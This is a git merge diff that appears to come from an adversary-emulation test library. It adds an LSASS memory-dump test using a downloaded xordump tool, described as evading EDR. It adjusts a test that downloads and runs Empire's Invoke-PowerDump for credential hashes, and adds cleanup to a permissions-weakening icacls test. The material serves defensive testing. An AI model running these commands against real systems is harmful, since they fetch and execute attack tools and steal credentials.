Merge branch 'master' into 1562.004_test1_cleanup

2021-05-21 13:39:29 -06:00
parent 201459202f 8d0a5c454c
commit ec39232f0d
18 changed files with 208 additions and 28 deletions
@@ -208,14 +208,14 @@ GEM
      rb-fsevent (~> 0.10, >= 0.10.3)
      rb-inotify (~> 0.9, >= 0.9.10)
    mercenary (0.3.6)
-    mini_portile2 (2.5.0)
+    mini_portile2 (2.5.1)
    minima (2.5.1)
      jekyll (>= 3.5, < 5.0)
      jekyll-feed (~> 0.9)
      jekyll-seo-tag (~> 2.1)
    minitest (5.14.2)
    multipart-post (2.1.1)
-    nokogiri (1.11.1)
+    nokogiri (1.11.4)
      mini_portile2 (~> 2.5.0)
      racc (~> 1.4)
    octokit (4.19.0)
@@ -228,6 +228,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
 credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
 credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
 credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -412,7 +413,7 @@ defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution -
 defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
 defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
 defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
-defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt
+defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
 defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
 defense-evasion,T1553.004,Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
 defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
@@ -680,7 +681,7 @@ discovery,T1518.001,Security Software Discovery,5,Security Software Discovery -
 discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
 discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
 discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
-discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt
+discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
 discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
 discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
@@ -84,7 +84,7 @@ defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500
 defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
 defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
 defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
-defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt
+defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
@@ -133,7 +133,7 @@ discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b3
 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
 discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
 discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
-discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt
+discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
 discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
 discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
 discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
@@ -26,6 +26,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
 credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
 credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
 credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -450,6 +450,7 @@
  - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
  - Atomic Test #10: Powershell Mimikatz [windows]
  - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+  - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)
@@ -50,6 +50,7 @@
  - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
  - Atomic Test #10: Powershell Mimikatz [windows]
  - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+  - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)
@@ -20953,6 +20953,43 @@ credential-access:
          & "#{createdump_exe}" -u -f #{output_file} $ID
        cleanup_command: 'del #{output_file}

+'
+        name: powershell
+        elevation_required: true
+    - name: Dump LSASS.exe using imported Microsoft DLLs
+      auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
+      description: "The memory of lsass.exe is often dumped for offline credential
+        theft attacks. This can be achieved by\nimporting built-in DLLs and calling
+        exported functions. Xordump will re-read the resulting minidump \nfile and
+        delete it immediately to avoid brittle EDR detections that signature lsass
+        minidump files.\n\nUpon successful execution, you should see the following
+        file created $env:TEMP\\lsass-xordump.t1003.001.dmp.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        xordump_exe:
+          description: Path to xordump
+          type: Path
+          default: C:\Windows\Temp\xordump.exe
+        output_file:
+          description: Path where resulting dump should be placed
+          type: Path
+          default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
+      dependencies:
+      - description: 'Computer must have xordump.exe
+
+'
+        prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe"
+          -OutFile #{xordump_exe}
+
+'
+      executor:
+        command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
+        cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore
+
 '
        name: powershell
        elevation_required: true
@@ -22732,7 +22769,7 @@ credential-access:
          Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
          Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
          Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
-          Import-Module .\PowerDump.ps1
+          Import-Module "$Env:Temp\PowerDump.ps1"
          Invoke-PowerDump
        name: powershell
        elevation_required: true
@@ -32908,7 +32945,7 @@ defense-evasion:
          description: Key we create that is used to create the CA certificate
          type: Path
          default: rootCA.key
-      dependency_executor_name: command_prompt
+      dependency_executor_name: sh
      dependencies:
      - description: 'Verify the certificate exists. It generates if not on disk.

@@ -32941,7 +32978,7 @@ defense-evasion:
          description: Key we create that is used to create the CA certificate
          type: Path
          default: rootCA.key
-      dependency_executor_name: command_prompt
+      dependency_executor_name: sh
      dependencies:
      - description: 'Verify the certificate exists. It generates if not on disk.

@@ -32957,7 +32994,7 @@ defense-evasion:
          "#{cert_filename}"

 '
-        name: command_prompt
+        name: sh
        elevation_required: true
    - name: Install root CA on Windows
      auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1
@@ -42958,8 +42995,27 @@ defense-evasion:
          description: Path of folder to recursively set permissions on
          type: path
          default: C:\Users\Public\*
+        file_path:
+          description: Path of folder permission back
+          type: Path
+          default: "%temp%\\T1222.001-folder-perms-backup.txt"
+      dependency_executor_name: command_prompt
+      dependencies:
+      - description: 'Backup of original folder permissions should exist (for use
+          in cleanup commands)
+
+'
+        prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
+
+'
+        get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1
+
+'
      executor:
        command: icacls "#{path}" /grant Everyone:F /T /C /Q
+        cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1
+
+'
        name: command_prompt
        elevation_required: true
  T1220:
@@ -48719,7 +48775,7 @@ discovery:
      supported_platforms:
      - macos
      executor:
-        name: command_prompt
+        name: sh
        elevation_required: false
        command: |-
          /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
@@ -48,6 +48,8 @@ The following SSPs can be used to access credentials:

 - [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe)

+- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
+

 <br/>

@@ -564,4 +566,54 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec



+<br/>
+<br/>
+
+## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
+importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump 
+file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
+
+Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| xordump_exe | Path to xordump | Path | C:&#92;Windows&#92;Temp&#92;xordump.exe|
+| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass-xordump.t1003.001.dmp|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+#{xordump_exe} -out #{output_file} -x 0x41
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item ${output_file} -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Computer must have xordump.exe
+##### Check Prereq Commands:
+```powershell
+if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
+```
+
+
+
+
 <br/>
@@ -138,6 +138,7 @@ atomic_tests:
      del C:\windows\temp\dumpert.dmp >nul 2> nul
    name: command_prompt
    elevation_required: true
+
 - name: Dump LSASS.exe Memory using Windows Task Manager
  auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
  description: |
@@ -158,6 +159,7 @@ atomic_tests:
      3. Dump lsass.exe memory:
        Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
    name: manual
+
 - name: Offline Credential Theft With Mimikatz
  auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023
  description: |
@@ -354,3 +356,37 @@ atomic_tests:
      del #{output_file}
    name: powershell
    elevation_required: true  
+
+- name: Dump LSASS.exe using imported Microsoft DLLs
+  auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
+  description: |
+    The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
+    importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump 
+    file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
+
+    Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
+  supported_platforms:
+  - windows
+  input_arguments:
+    xordump_exe:
+      description: Path to xordump
+      type: Path
+      default: C:\Windows\Temp\xordump.exe
+    output_file:
+      description: Path where resulting dump should be placed
+      type: Path
+      default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
+  dependencies:
+  - description: |
+      Computer must have xordump.exe
+    prereq_command: |
+      if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
+  executor:
+    command: |
+      #{xordump_exe} -out #{output_file} -x 0x41
+    cleanup_command: |
+      Remove-Item ${output_file} -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
@@ -179,7 +179,7 @@ Executes a hashdump by reading the hasshes from the registry.
 Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
 Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
 Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
-Import-Module .\PowerDump.ps1
+Import-Module "$Env:Temp\PowerDump.ps1"
 Invoke-PowerDump
 ```

@@ -94,7 +94,7 @@ atomic_tests:
      Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
      Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
      Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
-      Import-Module .\PowerDump.ps1
+      Import-Module "$Env:Temp\PowerDump.ps1"
      Invoke-PowerDump
    name: powershell
    elevation_required: true
@@ -224,6 +224,7 @@ You can set your own path variable to "C:\*" if you prefer.
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
 | path | Path of folder to recursively set permissions on | path | C:&#92;Users&#92;Public&#92;*|
+| file_path | Path of folder permission back | Path | %temp%&#92;T1222.001-folder-perms-backup.txt|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -233,9 +234,25 @@ You can set your own path variable to "C:\*" if you prefer.
 icacls "#{path}" /grant Everyone:F /T /C /Q
 ```

+#### Cleanup Commands:
+```cmd
+icacls '#{path}' /restore #{file_path} /q >nul 2>&1
+```



+#### Dependencies:  Run with `command_prompt`!
+##### Description: Backup of original folder permissions should exist (for use in cleanup commands)
+##### Check Prereq Commands:
+```cmd
+IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) 
+```
+##### Get Prereq Commands:
+```cmd
+icacls #{path} /save #{file_path} /t /q >nul 2>&1
+```
+
+


 <br/>
@@ -132,7 +132,21 @@ atomic_tests:
      description: Path of folder to recursively set permissions on
      type: path
      default: 'C:\Users\Public\*'
+    file_path:
+      description: Path of folder permission back
+      type: Path
+      default: '%temp%\T1222.001-folder-perms-backup.txt'
+  dependency_executor_name: command_prompt
+  dependencies:
+  - description: |
+      Backup of original folder permissions should exist (for use in cleanup commands)
+    prereq_command: |
+      IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
+    get_prereq_command: |
+      icacls #{path} /save #{file_path} /t /q >nul 2>&1
  executor:
    command: icacls "#{path}" /grant Everyone:F /T /C /Q
+    cleanup_command: |
+      icacls '#{path}' /restore #{file_path} /q >nul 2>&1
    name: command_prompt
-    elevation_required: true 
+    elevation_required: true 
@@ -75,10 +75,10 @@ Adversaries may attempt to get a listing of non-security related software that i



-#### Attack Commands: Run with `command_prompt`! 
+#### Attack Commands: Run with `sh`! 


-```cmd
+```sh
 /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
 /usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
 ```
@@ -33,7 +33,7 @@ atomic_tests:
  supported_platforms:
    - macos
  executor:
-    name: command_prompt
+    name: sh
    elevation_required: false
    command: |
      /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
@@ -90,14 +90,14 @@ echo sudo update-ca-certificates



-#### Dependencies:  Run with `command_prompt`!
+#### Dependencies:  Run with `sh`!
 ##### Description: Verify the certificate exists. It generates if not on disk.
 ##### Check Prereq Commands:
-```cmd
+```sh
 if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; 
 ```
 ##### Get Prereq Commands:
-```cmd
+```sh
 if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
 openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
 ```
@@ -123,24 +123,24 @@ Creates a root CA with openssl
 | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|


-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 


-```cmd
+```sh
 sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}"
 ```




-#### Dependencies:  Run with `command_prompt`!
+#### Dependencies:  Run with `sh`!
 ##### Description: Verify the certificate exists. It generates if not on disk.
 ##### Check Prereq Commands:
-```cmd
+```sh
 if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; 
 ```
 ##### Get Prereq Commands:
-```cmd
+```sh
 if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
 openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
 ```
@@ -44,7 +44,7 @@ atomic_tests:
      description: Key we create that is used to create the CA certificate
      type: Path
      default: rootCA.key
-  dependency_executor_name: command_prompt
+  dependency_executor_name: sh
  dependencies:
  - description: |
      Verify the certificate exists. It generates if not on disk.
@@ -74,7 +74,7 @@ atomic_tests:
      description: Key we create that is used to create the CA certificate
      type: Path
      default: rootCA.key
-  dependency_executor_name: command_prompt
+  dependency_executor_name: sh
  dependencies:
  - description: |
      Verify the certificate exists. It generates if not on disk.
@@ -86,7 +86,7 @@ atomic_tests:
  executor:
    command: |
      sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}"
-    name: command_prompt
+    name: sh
    elevation_required: true
 - name: Install root CA on Windows
  auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1
@@ -692,3 +692,4 @@ c75612b2-9de0-4d7c-879c-10d7b077072d
 e86f1b4b-fcc1-4a2a-ae10-b49da01458db
 10447c83-fc38-462a-a936-5102363b1c43
 fcbdd43f-f4ad-42d5-98f3-0218097e2720
+86fc3f40-237f-4701-b155-81c01c48d697